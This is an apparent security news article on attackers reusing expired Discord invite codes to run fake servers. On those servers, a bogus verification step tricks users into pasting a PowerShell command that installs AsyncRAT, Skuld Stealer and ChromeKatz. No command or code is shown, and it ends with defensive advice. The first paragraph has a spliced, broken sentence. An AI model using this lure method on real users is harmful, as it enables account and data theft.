A newly uncovered vulnerability in Discord’s invitation system has opened the door for cybercriminals to spread remote access malware. The flaw enables threat actors to hijack expired or deleted Discord invite links and redirect users to maCybercriminals have found a new way to spread malware by abusing Discord’s invitation system. They reuse expired or deleted invite links to lure victims into malicious servers. These attacks often involve remote access tools and info-stealers.
How Attackers Reuse Discord Invite Links
Discord allows users to generate server invite codes. While most links are random and temporary, boosted servers can create custom, vanity URLs. Once a server loses its boosted status, its unique invite code becomes available again.
Attackers actively monitor these changes. Once a vanity code becomes free, they register it for a malicious server. Researchers at Check Point confirmed that this loophole also applies to expired or deleted invite links.
Furthermore, Discord fails to handle the case sensitivity of invite codes properly. By changing upper-case letters to lowercase, attackers can register duplicate-looking codes. This trick allows them to run parallel fake servers under near-identical URLs.
Fake Verification Traps Lure Victims
After registering the recycled invite code, attackers distribute it across forums, social media, and community sites. These fake servers mimic real ones closely. Usually, visitors see only one channel, labeled #verify.
Inside this channel, a bot initiates a fake verification step. The bot leads users to a counterfeit Discord page. There, the system falsely claims a CAPTCHA error and asks users to run a copied PowerShell command.
Many users comply, thinking the command will fix the issue. Instead, the command triggers the malware infection process.
Malware Delivered in Multiple Stages
The PowerShell command downloads several files in stages. These payloads originate from Bitbucket, a trusted file-hosting platform. Check Point identified three main malware variants used in the campaign:
- AsyncRAT (AClient.exe): Offers remote control, keylogging, and microphone access. It fetches its command server from Pastebin.
- Skuld Stealer (skul.exe): Steals browser data, crypto wallet info, and Discord tokens. It uses JavaScript injection techniques.
- ChromeKatz (cks.exe): Extracts cookies and saved passwords from browsers.
To maintain control, the malware creates a scheduled task. This task ensures the infection reloads every five minutes.
How to Stay Protected on Discord
To avoid these attacks, always be cautious with Discord invite links—especially older ones shared in forums or chats. Avoid servers that require unexpected verification steps or system commands. Never run PowerShell commands unless you fully understand their origin.
Moreover, Discord server admins should use permanent invites. These are more difficult for attackers to reuse or hijack. It’s also wise to review vanity code usage and monitor for duplicate-like entries.
At Eye World, we recommend businesses educate their teams about social engineering threats. Regular cybersecurity awareness helps reduce the risk of falling for sophisticated scams like this one.
